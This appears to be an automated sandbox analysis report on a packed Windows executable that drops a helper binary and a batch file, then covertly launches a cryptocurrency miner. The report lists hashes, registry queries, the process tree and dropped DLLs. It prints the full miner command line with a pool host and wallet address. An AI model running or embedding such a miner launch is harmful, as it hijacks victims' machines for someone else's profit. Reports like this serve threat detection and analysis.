73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
299s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
22/02/2024, 06:37

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-910440534-423636034-2318342392-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-910440534-423636034-2318342392-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4420	b2e.exe
3580	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3580	cpuminer-sse2.exe
3580	cpuminer-sse2.exe
3580	cpuminer-sse2.exe
3580	cpuminer-sse2.exe
3580	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1780-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1780 wrote to memory of 4420	1780	batexe.exe	88
PID 1780 wrote to memory of 4420	1780	batexe.exe	88
PID 1780 wrote to memory of 4420	1780	batexe.exe	88
PID 4420 wrote to memory of 4444	4420	b2e.exe	89
PID 4420 wrote to memory of 4444	4420	b2e.exe	89
PID 4420 wrote to memory of 4444	4420	b2e.exe	89
PID 4444 wrote to memory of 3580	4444	cmd.exe	92
PID 4444 wrote to memory of 3580	4444	cmd.exe	92

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1780
- C:\Users\Admin\AppData\Local\Temp\5870.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\5870.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5870.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5AF1.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4444
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3580

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5870.tmp\b2e.exe

Filesize
4.7MB

MD5
dc4b4b12d569f9e6726375d81a9c76af

SHA1
a225963ae51c3b035b3e9512b19a7066a0ef16dd

SHA256
3f2711894ba8ea5d7eeb4b50476fd2dd5048685560d05a697c3d0145f41c7854

SHA512
22b711c9cedf7bd906c5e4c7d07f3238f92885eb2cba7cac5c416de35fd83d3db89d861afce1cd47e82c4682d1e34e372d409de136433f0950c6f2dbf35041db

Download Submit
C:\Users\Admin\AppData\Local\Temp\5870.tmp\b2e.exe

Filesize
2.1MB

MD5
874f0500ea1ee78235b4f4c57d8dd962

SHA1
f81f1f02f72364af4ec1a43dfa6e32a002f91b21

SHA256
3c02a4ba59889d686a46552da6425032c3514f7930ce6b2ed6b46a0743413870

SHA512
6b9087e155b3fa3676bb4a1b506578bef383f6edcc9a6e094795d776badb59ef9bcddb0d819e8aa516ca2102beeb3a6fd77923208c72b896fe1485b35da944bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\5870.tmp\b2e.exe

Filesize
1.8MB

MD5
df27a024bbb44186e533d0d76d1fde0a

SHA1
311b640574fc1f7545d33b65e4a6fd16d0d0bf76

SHA256
5cb311981cc331f655be747ec374fda87cb6e98d6ad4718623d68ceedd616118

SHA512
6497ff8772e6772710478db376f2dfc343b22f96fdf501c664ae06806c6087cd5964e391bc61b70017ad76d876773924ad7e6eb774a724edac6908dc7a887cd1

Download Submit
C:\Users\Admin\AppData\Local\Temp\5AF1.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
201KB

MD5
51b37b5dddccb3d1bafa77f3e5cf3c96

SHA1
b9740e3b60caddd21b71e4f8b493a67ba818cafa

SHA256
fee095b788a5bd11afaa372bee8709df9198ec80bd026f950edc54de1f8212f8

SHA512
747af2fc5d91b96281a3eb996c9a73066ab12711f9f21751dda2c89808434415057dca90176567b84ed018416133e3988350c05145b6180982f237772a79cd4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
347KB

MD5
ce204e2df44a529b1c653bfac2bcb43a

SHA1
62606c22d734fcc1e7295e00a6e8c9ae6e4b179f

SHA256
3c83bd0164a7ee161b7d3218113b9bca6d272ad4deaeeadab652daa1920540d0

SHA512
8b4e1e4a8ba1291074110f503c8e790ba112e728e3cba7bddaf3dd4b85375dddd9a75b3aeda424418e4ebf88faede848ce9e59e9f6b4b108ae43ab96af8a6799

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
177KB

MD5
efe50bd0a6957b3eaaf942e9731905b6

SHA1
b23d6fc51f148fbf231aa938fa5de62f0743c68a

SHA256
d73f538af888326527a33a91c40dac265225591a19b0f4a1b4a36aea4378bd86

SHA512
a7e6af4aea5a994934c83519bde91962bed5faabedddf10df0af92f1635032aea219e61777b1d59bbadacd49b3d4ee352c37b6f79f02849d0d034dc9776bf45a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
130KB

MD5
e024774b97e034b6f07a6f5655d657a5

SHA1
78d5f08aa444322592cf856b92e1e7871e6fca1f

SHA256
5280f7f364692f61fe53bc5d76eccb8165ad60c046b4a60ae8c75055e766086c

SHA512
ecb804951d8a932d9e8189647174c4e4cfffbfe32b61a661774cbadf75b85228faf05ec5f4519560f184df52b32c2cfa954a5461909aea7f022d80e7de393553

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
167KB

MD5
ec000e5c305be599c91cf2bd74e8504d

SHA1
f40783ff02f6fc2ec5ecb080ec6eb0a71117f6af

SHA256
d649c2acf39a974e0f3e08c864819e872ac42e514e0d09b8580ae3798a0199a6

SHA512
f6478a319147630bc3d2cae23695c47c36def7442564127024cf26b78ff8f1cce0bf18db3af413becc151222b2b285b44fe2e2f8719b15c1fb17f2fe203e78a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
217KB

MD5
6febfa55fc6a29e1e4846f597c9bbbb1

SHA1
c1b7132ac80571c0e82919de67e49a703ff17daa

SHA256
edc167e4efb4b86c12b84342e52b6e40735c17bd24ece9c56b2b3ac4831f9777

SHA512
770ae1cde44cfdee1cf0dc73d121ce4d24d9f36cf828c340ec56c158a1f11b45fb8d58cd7167bfec81fbb7f7c51453d72289ca6922f574a6a92593010f12717a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
109KB

MD5
82b9480f0d07192ecad707745d0ee72d

SHA1
267bf92c2252921167c60a402656a6ec347c9ef9

SHA256
2ffaa8c292e75e2947b6c545ef51a63def1404b97881f34a46429aac73a56994

SHA512
e537bbfe3d02fa71b52a21636c4e3674f81565a3781a80233c28240110827339b6dd46a8feebe93b66ce4a3f642b9e9f6fcabf9e733f2cf6fa8f1b29e89b84ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
200KB

MD5
18ca264b0e351b27a9de4e7329e4c4dc

SHA1
2ed85074fdd964e1918e43ce112c296696454ecc

SHA256
52c299dd3ba383449d036662016d52f8676f2d5db79d7948d217bc41524d5cc4

SHA512
e4ad6b550bc3ac4c9ec1f7d265c9860948e9f3dbdbb319baa5bd2e1ca7b79612e26d9aa90f0e8ad1c9f4337f28bca32a2237af749012d5fc939e99fcb2e6a65e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
123KB

MD5
2723ad8ccc22ec3679bc119d8955d908

SHA1
2bc554c4915e3ea1c9cba49f28ece7c284eaea15

SHA256
fa61ea9b7bacbca029ae8921c48a254d5e2f5a23cf2217e18f10cc31df9f78bf

SHA512
e96cedf52e0a84f59d1174bdc6dcdb7c970fb2cd113d5c6d9a044c82f0f97e942294fa94f991f3c875a4c67f12f7dfed9bfd33ad45a0a3da59c165eca89d5d05

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
142KB

MD5
9ef0748e0bb8e529b063d844cee3e23d

SHA1
6b50abcfb17153fb6ebe88da39aa767429d113a9

SHA256
0e75a78262231ee3dd928f1efe91e0707087d04187b466a62b4205bf00c76d07

SHA512
8a3b73eceea6350a03a18ac3648ea3b2691df40f9a4e9cb7e3478d6cf9957e8ebd7d31fee391e6169ddb603ffc4a37a44451bcef410dc8bb88ff0e82b5621d7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
192KB

MD5
625f906456510afaf916dd0384d76eee

SHA1
66c56574aff02fb199caa60ab71ca9f1c9e7fc92

SHA256
27baaef233592b03722c7d64c26d2270c0300ffb8e7f08a8e0d65212af4b848d

SHA512
041399c5ddc614d8b1a359238df8fb09258c95a0013e5139dbf4093b892395f5f78fa31fbecfee92966c5e78a5c5894005c98e559b8b5735ecf9c1995df51b17

Download Submit
memory/1780-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3580-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3580-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3580-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3580-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3580-46-0x0000000054F10000-0x0000000054FA8000-memory.dmp

Filesize
608KB

Download
memory/3580-47-0x0000000001030000-0x00000000028E5000-memory.dmp

Filesize
24.7MB

Download
memory/3580-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3580-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3580-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3580-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3580-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3580-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3580-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3580-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3580-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4420-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4420-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download